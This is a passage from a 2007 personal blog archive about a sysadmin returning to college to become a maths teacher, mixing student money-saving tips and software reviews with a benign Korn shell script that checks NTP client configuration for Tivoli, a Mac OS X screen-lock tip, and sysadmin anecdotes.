Follow-up: W-N answer my question

Updated on the 6th of September, 2007.

I've received an e-mail from the Wolters Noordhoff helpdesk. They inform me that they are aware of the compatibility issues when using anything but Internet Explorer on Windows.

They also inform me that they -are- indeed working on making all their software and websites W3C standards-compliant. However, this process will take a lot of time, since there's just so much code to go through. So unfortunately, for the next few years I guess, we'll be stuck with IE.

One tip they gave me: the first thing they'll start reworking so it fits all the standards are the online study resources. Getal en ruimte makes use of a bunch of online aids and tools and these will be recoded ASAP. These tools can be found at the method's website.



Follow-up 2: W-N publish their new I-Clips

Updated on the 9th of October, 2007.

This year, Wolters-Noordhoff published the latest edition of the Moderne Wiskunde series: version 9. A new feature for this method is the inclusion of additional, online resources called I-Clips. These can be accessed through the W-N site, or through Schoolwise.nl

Ironically, even these new ICT features only work properly on a Windows system. On Mac OS X, Safari leaves the screen mostly empty, while Firefox does show me some images but runs away with the processor :(

Naturally I've sent W-N another e-mail about this.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Well, today's the first day of school!

2007-09-03 07:27:00

Wow! Today's the first day of school and it already feels rather different! I went to bed around 2130, read for an hour, then slept like a brick. And I woke around 0700, instead of the usual 0600 on workdays. This actually feels rather nice! Combine that with yesterday and I'm feeling rather relaxed!

You see, yesterday I was feeling really worked up because I hadn't studied yet, nor done any of my maths revision like I said I would. Too much time had gone into this site's redesign and after that I was just too busy socially. Of course, getting worked up in this case was counterproductive: how much could I do in just a few hours?

So instead I decided to follow the sage advice of my wiffums and some of my friends: I relaxed. After taking Marli to work I went back to bed, read a lot, slept a bit and chomped away half a tube of Pringles. So yea, it may have been a "horrible" evening, but IMHO it was "great".

I'm sorry that I had to blow off Peter's invitation for a walk though. He was reaching out to me, but I didn't go. I'll go and visit them this week...


kilala.nl tags: ,

View or add comments (curr. 4)

Tips from Stef Heinsman, our director

2007-08-31 11:40:00

On the 30th of August 2007, Stef Heinsman opened the new academic year at Instituut Archimedes. All freshmen for the tweedegraads docent course attended an introductory meeting, welcoming them to their new school.

Surprisingly, our director/rector Stef Heinsman had some interesting tidbits for the crowd. It wasn't the expected, useless ramble :)

The three most important lessons from his own past:

  1. Always attend lectures and sessions.
  2. Don't postpone your work.
  3. Be stubborn when you can afford it.

By attending lectures you build a solid relationship, both with your teachers and your fellow students. You will also remain immersed in the whole spirit of school and teaching, ensuring your continued enthusiasm.

By not postponing your work, Stef is convinced that you will build confidence in your own competences. By taking the same tests and projects as your fellow students, at the same time, you will realize that they're in the same boat. Things may be hard for you, but there are other people in the exact same situation.

At times you'll be convinced that your own approach to a certain situation is the best one. Don't feel forced to take the teacher's approach; verify your own opinions. Become autonomous, allowing you to do your own work when you need to.

Combining these three factors will help you with your motivation. It's what you're going to need when things get a little rough around the edges.

In conclusion, Stef also asks us to take care of ourselves. Don't lose your health, don't burn out and make sure that things are fine at home. Because the people at home are your strongest foundations.

He also suggested that you should teach something that you enjoy. By doing that you'll not only convey knowledge, but also enthusiasm!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Saving money as a student

2007-08-31 10:29:00

A money tree

Most of us students aren't rich. Part-time students like me timeshare between their job and their education, trying to find a balance. Freshmen straight out of high school usually have it even harder, getting by on crappy jobs instead of a real job. Most of us rely on government grants, or support from family. All in all, we don't have it easy getting by.

Unfortunately, once you've paid your tuition, you're not done yet! There's books, study supplies, software and hardware that you'll need. And all of that stuff costs money as well! Luckily there are some nice ways to get discounts or even free stuff!

Saving on books and syllabi

School books are, in general, pretty damn expensive. One of the maths books I need for my first semester rings in at around forty euros! I'm glad to say that it's possible to get better deals online. The Netherlands' largest online bookstore, Bol.com, has gotten into a new market: second hand books.

In their 2eHANDS section they mediate between seller and buyer. People wanting to sell books can open an ad and name their price. Mind you, not all books on 2eHANDS are in pristine condition, some being downright ragged. Buying books from 2eHANDS couldn't be easier since it uses the normal Bol.com ordering process. You add books to your shopping cart, you proceed to checkout and you pay Bol.com in the preferred manner. You won't have to worry about shipping, or talking to the seller: Bol.com takes care of all that.

I managed to save about seventy euros on an order that would've otherwise cost me almost three hundred euros. Result!

When it comes to syllabi (dictaten in Dutch) things will be a little bit harder. These books are usually created, printed and published by the school itself and thus much harder to find. In a lot of cases the syllabi are a waste of paper, since you'll only use them a couple of times.

Thankfully, some syllabi are available digitally and for free! Search your school's Intranet or ask your teachers if they are aware of any digital copies.

Saving on software

As a student you'll be using a lot of different software to get through school. You'll be typing reports, researching new materials, trying to prove theorems, and so on. What a lot of people don't know is that a lot of software can be found very cheaply or even for free.

Saving on Microsoft Office

Most notable among the software you will use are the various Microsoft Office tools, like Word, Excel and Powerpoint. Of course, Microsoft's software is famously expensive! Paying through the nose, just to type up your reports is a bad idea. So here are a few alternatives!

First off, Surfspot.nl offers discounted software to most of the Netherlands' students. This way you can get an official and completely legal license for MS Office at around thirty euros! Absolutely amazing! Aside from Office, Surfspot also offers a huge amount of other software, like Photoshop, web design tools and security software. It's really neat!

If you have a hearty dislike for all things Microsoft and want to use an office suite other than MS Office, take a look at the following. Apple's iWork rings in at around eighty euros and is very slick. It may not have all the thousands of features that Office does, but most of us won't even need them. If you're looking for something that's completely free, take a look at Open Office. As I said it's completely free and it's available for most modern operating systems!

If you're looking for a smaller and simpler editor for your reports, take a look at Mellel. This cheap piece of software was originally created for students, authors and researchers, so they could create reports in an orderly fashion. Apparently it's rather easy to use, yet it remains powerful.

Saving on other software

A lot of commercial software has either shareware or free, open source alternatives. Try using Google to search for some software. Or dig around websites like Version Tracker or Apple Downloads.

Saving on hardware

Since I'm of the Mac-persuasion, I'll open with Apple's deals. By shopping at the Apple education store you'll get a 10% discount off all hardware acquisitions. In my opinion the Macbook makes a great companion to any student. Getting a 10% discount makes it even better!

Some colleges and universities have laptop projects, where they strike a deal with a laptop vendor to get stuff on the cheap. For instance, Hogeschool Utrecht takes part in Notebookprojecten.nl. Those guys offer laptops and various peripherals at low prices. Just now I noticed an external LaCie hard drive (160 GB, bus-powered, USB 2.0) for a hundred euros. That's pretty damn good!

So ask around your school, or check its Intranet. Maybe you're lucky as well!

The Money Tree image was borrowed from Thinkquest.org.


kilala.nl tags: , ,

View or add comments (curr. 0)

Teaching is popular. Maths even more so.

2007-08-31 07:00:00

Last night was the school year's official opening at Hogeschool Utrecht. Around 17:00 all aspiring tweedegraads teachers gathered in the cafeteria for a speech from the rector. It was interesting to see that the group was both large and varied. I reckon there were about a hundred people there, maybe one-twenty. Aged between twenty and somewhere in their fifties, I saw a lot of Caucasians, mixed in with a few Turks and Moroccans.

One startling realization was the fact that almost 50% of the group were there for the same degree I was after: tweedegraads maths teacher. I guess either it's a popular pastime, or people have caught on to the fact that maths teachers are sought after. All in all there's sixty people starting the maths course this year. Wow!

After the whole introduction and a tour of the school building (which we'll be leaving come January, to move to a new one) there were drinks. I finally got the chance to meet some of my fellow students. It's slightly daunting to know that a whole bunch of them are already in education, but I'm not going to let that get in my way :)

So far they seem like a nice bunch of people! There's the strong-and-silent guys, the rowdy drinking-after-playing-football guys, the silent-and-mousy women and so on. There was also this one woman (I think she's in her forties though I'm horrible at guessing ages) who's great! She's absolutely bubbling with enthusiasm for the course! Kind of like how I felt after my intake with the coordinator :)

Yes. This is going to be an interesting year!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

How cool is this? I'm still me!

2007-08-30 15:52:00

The letter that confirms my enrollment.

Heheh, this is so sweet. Just a few weeks ago I was wishing out loud that I'd get my old student number back, now that I'm returning to Hogeschool Utrecht.

Lo and behold, today I get a letter that's part of my enrollment process. And what does it tell me? That my student number is good ol' 1018808. Sweet! I'm back to being me! ^_^


kilala.nl tags: , ,

View or add comments (curr. 3)

Tivoli script: check_ntpconfig.sh

2007-08-30 11:46:00

This script was written at the time I was hired by T-Systems.

This script is an evolution of my earlier check_ntp_config. This time it's meant for use with Tivoli, although modifying it for use with Nagios is trivial. The script was written to be usable on at least five different Unices, though I've been having trouble with Darwin/OS X.

The script was tested on Red Hat Linux, Tru64, HP-UX, AIX and Solaris. Only Darwin seems to have problems.

Just like my other recent Nagios scripts, check_ntpconfig.sh comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution.


#!/usr/bin/ksh
#
# NTP configuration check script for Tivoli.
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of T-Systems, CSS-CCTMO, the Netherlands
# Last Modified: 13-09-2007
# 
# Usage: ./check_ntp_config
#
# Description:
#   Well, there's not much to tell. We have no way of making sure that our 
# NTP clients are all configured in the right way, so I thought I'd make
# a Nagios check for it. ^_^ After that came this derivative Tivoli script.
#   You can change the NTP config at the top of this script, to match your
# own situation.
#
# Limitations:
#   This script should work fine on Solaris, HP-UX, AIX, Tru64 and some
# flavors of Linux. So far Darwin-compatibility has eluded me.
#
# Output:
#   If the NTP client config does not match what has been defined at the 
# top of this script, the script will echo $STATE_NOK. In this case, the 
# STATE variables contain a zero and a one, so you'll need to use a 
# "Numeric Script" monitor definition in Tivoli. Anything above zero is bad.
#
# Other notes:
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details.
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#

### SETTING THINGS UP ###
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
PROGNAME="./check_ntp_config"
STATE_NOK="1"
STATE_OK="0"

. /opt/Tivoli/lcf/dat/dm_env.sh >/dev/null 2>&1


### DEFINING THE NTP CLIENT CONFIGURATION AS IT SHOULD BE ###
NTPSERVERS="192.168.22.7 192.168.25.7 192.168.16.7"


### DEBUGGING SETUP ###
# Cause you never know when you'll need to squash a bug or two
DEBUG="1"

if [[ $DEBUG -gt 0 ]]
then
        DEBUGFILE="/tmp/thomas-debug.txt"
	if [[ -f $DEBUGFILE ]]
	then
            rm $DEBUGFILE >/dev/null 2>&1
	    [[ $? -gt 0 ]] && echo "Removing old debug file failed."
	    touch $DEBUGFILE
	fi
fi


### REQUISITE COMMAND LINE STUFF ###

print_usage() {
	echo ""
	echo "Usage: $PROGNAME"
}

print_help() {
	echo ""
	echo "NTP client configuration monitor plugin for Tivoli."
	echo ""
	echo "This plugin not developped by IBM."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
	echo ""
	print_usage
	echo ""
}

while test -n "$1" 
do
	case "$1" in
	  *) print_help; exit $STATE_OK;;
	esac
done


### DEFINING SUBROUTINES ###

function SetupEnv
{
    case $(uname) in
	Linux) 	CFGFILE="/etc/ntp.conf"; 
		IPCMD="host" 
		IPMOD="tail -1"
		NAMEMOD="tail -1"
		IPFIELD="4"
		NAMEFIELD="5" 
		GREP="egrep -e" ;;
	SunOS) 	CFGFILE="/etc/inet/ntp.conf"
		IPCMD="getent hosts"
		IPMOD=""
		NAMEMOD=""
		IPFIELD="1"
		NAMEFIELD="2"
		GREP="egrep -e" ;;
	Darwin) CFGFILE="/etc/ntp.conf"
		IPCMD="host"
		IPMOD=""
		NAMEMOD=""
		IPFIELD="4"
		NAMEFIELD="1"
		GREP="egrep -e" ;;
	AIX)    CFGFILE="/etc/ntp.conf"
		IPCMD="host"
		IPMOD=""
		NAMEMOD=""
		IPFIELD="3"
		NAMEFIELD="1"
		GREP="egrep -e" ;;
	HP-UX)  CFGFILE="/etc/ntp.conf"
		IPCMD="nslookup"
		IPMOD="grep ^\"Address\""
		NAMEMOD="grep ^\"Name\""
		IPFIELD="2"
		NAMEFIELD="2"
		GREP="egrep -e" ;;
	OSF1)   CFGFILE="/etc/ntp.conf"
		IPCMD="nslookup"
		IPMOD="grep ^\"Address\" | tail -1"
		NAMEMOD="grep ^\"Name\" |tail -1"
		IPFIELD="2"
		NAMEFIELD="2"
		GREP="egrep -e" ;;
	*) echo "Sorry. OS not supported."; exit 1 ;;
    esac

    FAULT=0

    if [[ $DEBUG -gt 0 ]]
    then
	echo "=== SETUP ===" >> $DEBUGFILE
	echo "OS name is $(uname)" >> $DEBUGFILE
	echo "CFGFILE is $CFGFILE" >> $DEBUGFILE
	echo "IPCMD is $IPCMD" >> $DEBUGFILE
	echo "IPMOD is $IPMOD" >> $DEBUGFILE
	echo "NAMEMOD is $NAMEMOD" >> $DEBUGFILE
	echo "IPFIELD is $IPFIELD" >> $DEBUGFILE
	echo "NAMEFIELD is $NAMEFIELD" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
	echo "NTPSERVERS is $NTPSERVERS" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi
} 

function ListInConf
{
    if [[ -z $NTPSERVERS ]]
    then
	echo "You haven't configured this monitor yet. Set \$NTPSERVERS."; exit 0
	[[ $DEBUG -gt 0 ]] && echo "NTPSERVERS variable not set." >> $DEBUGFILE
    else

    for HOST in $(echo $NTPSERVERS)
    do
    SKIPIP=0
    SKIPNAME=0

    if [[ $DEBUG -gt 0 ]]
    then
	echo "=== LISTINCONF ===" >> $DEBUGFILE
	echo "HOST is $HOST" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi

        if [[ -z $(echo $HOST | $GREP [a-z,A-Z]) ]]	    
        then
            IPADDRESS="$HOST"
	    TEST=$($IPCMD $HOST 2>/dev/null)

	    if [[ ( $? -eq 0 ) && ( -z $(echo $TEST | $GREP NXDOMAIN) ) ]] 
	    then
		[[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
            	HOSTNAME=$($IPCMD $HOST 2>/dev/null | $NAMEMOD | cut -f$NAMEFIELD -d" " | cut -f1 -d.)
	    else
		[[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
		HOSTNAME=""
	    fi

	    if [[ -z "$HOSTNAME" ]]	# string test; -eq is for numbers
	    then
	    	QUERY="$IPADDRESS"
	    	[[ $DEBUG -gt 0 ]] && echo "Skipping hostname verification" >> $DEBUGFILE
	    else
	    	QUERY="$HOSTNAME $IPADDRESS"	
	    	[[ $DEBUG -gt 0 ]] && echo "Checking both IP and name." >> $DEBUGFILE
	    fi
        else
            HOSTNAME="$HOST"
	    TEST=$($IPCMD $HOST 2>/dev/null)

	    if [[ ( $? -eq 0 ) && ( -z $(echo $TEST | $GREP NXDOMAIN) ) ]] 
	    then
		[[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
            	IPADDRESS=$($IPCMD $HOST 2>/dev/null | $IPMOD | cut -f$IPFIELD -d" ")
	    else
		[[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
		IPADDRESS=""
	    fi

	    if [[ -z "$IPADDRESS" ]]	# string test; -eq is for numbers
	    then
		QUERY="$HOSTNAME"
		[[ $DEBUG -gt 0 ]] && echo "Skipping IP address verification" >> $DEBUGFILE
	    else
		QUERY="$HOSTNAME $IPADDRESS"	
		[[ $DEBUG -gt 0 ]] && echo "Checking both IP and name." >> $DEBUGFILE
	    fi
        fi

    if [[ $DEBUG -gt 0 ]]
    then
	echo "IPADDRESS is $IPADDRESS" >> $DEBUGFILE
	echo "HOSTNAME is $HOSTNAME" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi

	for NAME in `echo $QUERY`
	do
       	    [[ -z $($GREP $NAME $CFGFILE | $GREP "server") ]] && let FAULT=$FAULT+1
	done

    done

    fi
}

function ConfInList
{
    NUMSERVERS=$($GREP ^"server" $CFGFILE | wc -l)

    if [[ $DEBUG -gt 0 ]]
    then
	echo "=== CONFINLIST ===" >> $DEBUGFILE
	echo "Number of \"server\" lines in $CFGFILE is $NUMSERVERS" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi

    if [[ $($GREP ^"server" $CFGFILE | wc -l) -gt 0 ]]
    then

	for HOST in $(cat $CFGFILE | $GREP ^"server" | awk '{print $2}')
	do
		if [[ $DEBUG -gt 0 ]]
		then
			echo "HOST is $HOST" >> $DEBUGFILE
			echo "" >> $DEBUGFILE
		fi
		if [[ -z $(echo $HOST | $GREP [a-z,A-Z]) ]]	    
		then
			IPADDRESS="$HOST"
	    		TEST=$($IPCMD $HOST 2>/dev/null)

			if [[ ( $? -eq 0 ) && ( -z $(echo $TEST | $GREP NXDOMAIN) ) ]] 
			then
			    [[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
            		    HOSTNAME=$($IPCMD $HOST 2>/dev/null | $NAMEMOD | cut -f$NAMEFIELD -d" " | cut -f1 -d.)
			else
			    [[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
			    HOSTNAME=""
	    		fi

			if [[ -z "$HOSTNAME" ]]	# string test; -eq is for numbers
			then
			    QUERY="$IPADDRESS"
			    echo "Skipping hostname verification" >> $DEBUGFILE
			else
			    QUERY="$HOSTNAME $IPADDRESS"	
			    [[ $DEBUG -gt 0 ]] && echo "Checking both IP and name." >> $DEBUGFILE
			fi
		else
			HOSTNAME="$HOST"
	    		TEST=$($IPCMD $HOST 2>/dev/null)

			if [[ ( $? -eq 0 ) && ( -z $(echo $TEST | $GREP NXDOMAIN) ) ]] 
			then
			    [[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
            		    IPADDRESS=$($IPCMD $HOST 2>/dev/null | $IPMOD | cut -f$IPFIELD -d" ")	# look up the IP belonging to this server name
			else
			    [[ $DEBUG -gt 0 ]] && echo "TEST is $TEST" >> $DEBUGFILE
			    IPADDRESS=""
	    		fi

			if [[ -z "$IPADDRESS" ]]	# string test; -eq is for numbers
			then
				QUERY="$HOSTNAME"
				echo "Skipping IP address verification" >> $DEBUGFILE
			else
				QUERY="$HOSTNAME $IPADDRESS"	
				[[ $DEBUG -gt 0 ]] && echo "Checking both IP and name." >> $DEBUGFILE
			fi
		fi

		if [[ $DEBUG -gt 0 ]]
		then
			echo "IPADDRESS is $IPADDRESS" >> $DEBUGFILE
			echo "HOSTNAME is $HOSTNAME" >> $DEBUGFILE
			echo "" >> $DEBUGFILE
		fi

		for NAME in `echo $QUERY`
		do
		    [[ -z $(echo $NTPSERVERS | $GREP $NAME) ]] && let FAULT=$FAULT+1
		done

	done
    fi
}

### FINALLY, THE MAIN ROUTINE ###

SetupEnv

    if [[ $DEBUG -gt 0 ]]
    then
	echo "=== STARTING MAIN PHASE ===" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
	echo "=== NTP CONFIG FILE ===" >> $DEBUGFILE
	cat $CFGFILE | grep -v ^"\#" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi

ListInConf
ConfInList

# Nothing caused us to exit early, so we're okay.
if [[ $FAULT -gt 0 ]]
then
    echo "$STATE_NOK"
    exit $STATE_NOK
else
    echo "$STATE_OK"
    exit $STATE_OK
fi
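
A quick usage sketch to wrap up (the addresses below are examples, not real servers): edit the script, set the expected servers, then run it by hand before wiring it into Tivoli.

  NTPSERVERS="192.168.22.7 ntp1.example.com"    # inside the script: list your own servers
  ./check_ntpconfig.sh
  0                                             # 0 = config matches, 1 = something is off

A "Numeric Script" monitor in Tivoli can then alert on anything above zero. For a Nagios version you'd translate that 1 into the usual WARNING/CRITICAL exit codes instead.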

kilala.nl tags: , , ,

View or add comments (curr. 0)

Tips and tools: Schoolhouse 2

2007-08-23 21:11:00

Studying is hectic business

As a student, especially as a freshman, things can become very chaotic. You will need to juggle your courses, your projects, your work and your social life. There's teachers and fellow students and there are all kinds of things you need to do.

In order to survive you'll need to keep a clear head and get your act together. Keeping track of all your work and having it all at your fingertips is crucial.

There are all kinds of tools and tricks that will help you get along. There's methodologies like PEP and GTD. And there's online tools like Gmail/Google Calendar and MyQuire.

A lot of the modern operating systems also help you out by providing useful features. Mac OS X for example, features software like Spotlight, Time Machine, Address Book and iCal. I'm sure Windows comes with useful stuff too, but I'm just not familiar with that stuff ~_^

Getting organised: Schoolhouse 2

Recently I read an article on Life Hacker (a productivity blog) about Schoolhouse 2. The author lauded Schoolhouse as an innovative piece of software that has great potential.

SH lets you organize all your notes, files, projects, tasks and assignments. The interface is quite similar to that of iTunes, so one should quickly get used to it. On the left hand side we can create folders and subfolders to symbolize years, terms and courses. (Smart) notebooks are the analogue of playlists, allowing you to sort assignments irrespective of their course.

Courses can be assigned a number of credits, so you'll know exactly what you're up against. Each course may also contain any number of notes, assignments, labs, midterms, exams, etc. All of these can be assigned grades, so you can track your progress throughout the term. In a nice twist of things, you can also assign each course teachers, project members, attachments and To Do lists.

The interface sports a number of useful buttons, like Ask teacher which automatically opens a new e-mail to your teacher. The grade and calendar views are also pretty damn useful.

I've discovered a few downsides to Schoolhouse 2. For one, the interface is still far from consistent and has its share of instabilities. Also, all your notes and SH objects are stored in a proprietary database. The only exception being your attachments. As far as I know, the database doesn't hook into Spotlight, so you can't search SH from the operating system. Shame.

One of the most clamoured-for features for SH is integration with iCal. Apparently the developer is looking into this, but he's only a student himself. Finding time to make a new version of Schoolhouse can be hard :)

Get Schoolhouse 2.

Also, please don't be stingy. Good software deserves a bit of a reward. If you find yourself using Schoolhouse for your daily work, please consider making a donation to Logan Collins. I'm sure he can use the dough for his software development.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Saving money as a college student

2007-08-22 11:57:00

Recently I discovered that the Netherlands' largest online bookstore Bol deals in secondhand books. Or more precisely: it works as an intermediary between seller and buyer. I guess you could compare it to the Amazon Marketplace.

Study books are notoriously expensive, often ranging between forty and a hundred euros a piece. Of course I wasn't looking forward to paying such a huge sum now that I'm starting college. Lo and behold! Bol's secondhand section listed six out of the eight books I need for the first semester. By buying these books I managed to save seventy euros, bringing the total down to a little over two hundred. Nice!

Another nice way of saving a few bucks is the fact that Hogeschool Utrecht allows spread payment of my fees. This year's college fee is about a thousand euros, give or take a few. Instead of paying this whole sum up front, I can now pay in six terms. Even better, these terms are spread all over the whole year. This means that we can easily save up a little money and still have ample breathing room.


kilala.nl tags: , ,

View or add comments (curr. 4)

It'll be a grand year!

2007-08-22 08:58:00

My roster for this school year

There you have it: my school roster for this year. It may be a bit hard to read the first time around, but let me break it down for you.

The table shows all courses for both the first and second years of my study (english math teacher). All courses are given on Monday and the appropriate times are shown on the left. The four columns to the right indicate each semester: there's four in a year and most courses are only given once a year.

Due to my prior experience and BCS in electronics I get to skip approximately 100 - 130 ECTS out of the 240 ECTS required for the whole study. ECTS are the pan-European equivalent of America's credits. Because of that I can manage to squeeze some of my second year courses into the first year. W00t! /o/

SEMESTER 1:

* Statistiek 1. I'll need to study both the math and the didactics behind statistics and the calculation of chances.

* SLB. This roughly translates as Study career guidance. We'll discuss my progress, the school itself, the materials. It's a bit of a meta-course.

* Vakdidactiek 2. A second year project on didactics and the interaction with students. I'll need to find out whether I can take this in the first semester without any big problems.

SEMESTER 2:

* Analyse 1. I can skip the math behind analytical math (differentials, integrals, logarithms), but I'll need to study the didactics.

* SLB. The same as the first semester.

* WER. Preparing for my internships, later in the year.

* Kijk op leerlingen. A project on the psychology and behaviour of students.

One challenge that I'm going to have to tackle is this. In my first two years I'll have the course WER, which stands for Work, Experience, Reflection. The second-year WER requires me to teach ten consecutive classes, one a week. This would mean that I'd have to convince Snow to allow me to take ten three-day work weeks. Ouch. So far I don't know how or when all of this will take place, but I'd better prepare a good story for Snow :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Contacting Thomas Sluyter

2007-08-19 19:35:00

Recently we've been getting a lot of spam in our e-mail boxes, thanks to various bots grabbing our mail addresses from our contact pages. That's why we decided to put all the info in a .JPG instead. Sorry for any inconvenience.

Of course I also have a LinkedIn profile.

If you would like to send me an encrypted email, or if you would like to verify a signed email I sent you: here is my public PGP key

Contact info for Thomas


kilala.nl tags: , ,

View or add comments (curr. 13)

College applications take time

2007-08-16 10:28:00

Damn. I should've seen this coming.

I just phoned the IBG to check up on my college application. The school coordinator had told me that my application would come through in time, but I decided to check up on it anyway. Nope. No sign of any application or registration yet. Apparently they take three to four weeks to process. Ugh!

Now I'm going to have to make arrangements with school to either study there unregistered, or to do some other red-tape trickery. It'll work itself out, but it still feels a little stressful.


kilala.nl tags: , ,

View or add comments (curr. 2)

Math revision

2007-08-14 21:36:00

Seven math books.

Since school starts in about three weeks I thought it was about damn time to start getting prepared! It's one thing to make all arrangements with the school, taking care of paperwork and talking to people. But it's another thing entirely to actually be prepared for the course material!

I graduated from college a little over seven years ago. For about half of my college years I was very busy with maths, learning all kinds of new tricks. All the other time was spent programming, doing web design and learning about Unix. Since my career progressed with the latter half of what I just described, it's only natural for my maths to be a little rusty.

Well, rusty would be an understatement. Consider if you will one of the original iron nails that Noah had used in his ark. Having been exposed to tremendous amounts of sea water and ages upon ages of time it's sure to be a bit rusty. Now, let's assume that ever since that flood the nail had been exposed to corrosives, acid rain and various other nasties. Not much would be left of it, right? A nasty, little chunk of iron would be all that's left.

Well, that's where my current grasp of maths is.

Thankfully I am confident that I can at least completely revive my high school math skills, considering this blog post. Back in 2005 I prepped Marlijne for an exam that consisted of all my HS maths in only a few hours.

Also thankfully, unlike what I wrote in that blog post, I did -not- throw away my math books! /o/

The picture above shows all of the books that I want to go through before school starts. The bottom row (plus the b/w book at the top left) are all high school books from my final two years. They cover everything from functions and equations, through trigonometry, to differentials and logarithms.

The top row is the stuff I went through in college. It's also the stuff that currently gives me a dread feeling in my stomach because it is way beyond me. They start out by repeating a little bit of HS stuff (differentials, functions), but then quickly move on to limits, logarithms, partial differentials, integrals, multiple variable equations and vectors. Zounds! I won't even mention the two other books that cover Laplace transforms and Fourier series. Although I doubt whether I'll need to know any of that stuff.

Unfortunately I -have- thrown out all of my syllabi, meaning that I'm out of materials on chance calculation and on matrices. Luckily my friend The Saint is willing to lend me his copies. Apparently his storage space is larger than mine and he's hung onto most of the stuff from our college years ^_^

Well! Here I go! Study study study!


kilala.nl tags: , , ,

View or add comments (curr. 2)

Big career changes: submitting my enrollment

2007-08-07 07:55:00

An envelope lying on a table.

Well, now there's absolutely no way back: I've sent in my application form for the local college. Hopefully I'll receive more information in a few days time.

I have to say that I rather dislike the application process though. In the Netherlands, there's one big organisation that handles 99% of the college and uni applications: Informatie Beheer Groep. They also take care of all student loans and grants and the resulting debts. As they are a governmental organisation, they allow one to log in using one's national DigID. This DigID is tied to one's social security number and allows one to get a lot of stuff done through the web. Thus one will not have to fill out endless forms, or to wait for hours at city hall.

Theoretically speaking that is. Because for some reason the IB Groep doesn't allow you to submit any applications online. Oh sure, they've made a very nice web app that'll walk you through the process of filling out the form with all the requisite data. Sure! But once the whole process is done, you're still going to have to print the form, sign it and send it in. :(

I thought we were getting that DigID (which includes SMS verification) to sign crap like this?

Anywho: the application is on its way! /o/


kilala.nl tags: , ,

View or add comments (curr. 2)

Grappling with HP ServiceGuard

2007-08-01 15:26:00

Last night's planned change was supposed to last about two hours: get in, install some patches, switch some cluster resources around the nodes, install some more patches and get out. The fact that the installation involved an HP-UX system didn't get me down, even though we only work with Sun Solaris and Tru64. The fact that it involved a ServiceGuard cluster did make me a little apprehensive, but I felt confident that the procedures $CLIENT had supplied me would suffice.

Everything went great, until the 80% mark... Failing the applications back over to their original node went wrong for some reason and the cluster went into a wonky state. The cluster software told me everything was down, even though some of the software was obviously still running. The cluster wouldn't budge, not up, nor down. And that's when I found out that I rather dislike HP ServiceGuard, all because of one stupid flaw.

You see, all the other cluster software I know provides me with a proper listing of all the defined resources and their current state. Sun Cluster, Veritas Cluster Server and TruCluster? All of them are able to give me a neat list of what's running where and why something went wrong. Well, not HP Damn ServiceGuard. Feh!

We ended up stopping the database manually and resetting all kinds of flags on the cluster software. Finally, after six hours (instead of the original two), I got off from work around 23:00. Yes... /me heartily dislikes HP ServiceGuard.


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Happy sysadmin day!

2007-07-27 10:55:00

It's the last Friday of July and you know what that means. It's Sysadmin Day, an international holiday on which end-users thank their admins for all their hard work! Or it would be, if anyone actually cared... *sigh* All I ever wanted was an STFU mug.

To all the sysadmins who -do- get some appreciation from their customers today: good on you! Enjoy your brief period in the lime light! ^_^


kilala.nl tags: , , ,

View or add comments (curr. 2)

Mac OS X: locking your screen, without a screen saver password

2007-07-26 17:41:00

This afternoon my buddy Edmond came up to me with an interesting predicament. He runs Mac OS X on his Macbook and would like to:

A) have a password-less screen saver

B) have the ability to lock his screen with a password

Usually one simply uses screen saver passwords to achieve goal B, but Ed was adamant that he wanted A as well. Not something you often see, right? Initially I thought it wouldn't be possible, but then I had a flash of insight. It's possible! Here's how...

1. Open "System Preferences". Go into "Security".

2. Uncheck the box marked "Require password to wake...".

3. Open "Keychain Access". Open its preferences window.

4. Check the box marked "Show status in menu bar".

5. A padlock appears in your menu bar.

From now on you can lock your screen by clicking on the padlock and selecting "Lock screen". And you can still use your screen saver and go back into the OS without a password. The only downside to this is that one can also wake up your system from sleep without a password. Not something I'd like to have if my laptop was ever stolen.
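As an aside, if you'd rather trigger the lock from the Terminal (or from a launcher like Quicksilver), the fast user switching binary can drop you back to the login window while your session keeps running. I've only used this trick on Tiger-era systems, so treat the path as an assumption and check that it exists on your machine first:

  # drops you back to the login window, leaving your session running in the background
  "/System/Library/CoreServices/Menu Extras/User.menu/Contents/Resources/CGSession" -suspend

It's not quite the same as the Keychain padlock, but the end result is a locked screen without touching your screen saver settings.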


kilala.nl tags: , , ,

View or add comments (curr. 0)

Sun Fire V890: pretty, but with a nasty flaw

2007-07-17 10:12:00

The ports section of the V890.

Oy vey! One of the folks on the Sun Fire V890 design team must've been mesjoge! Why else would you decide to make such a weird design decision?!

What's up? I'll tell you what's up!

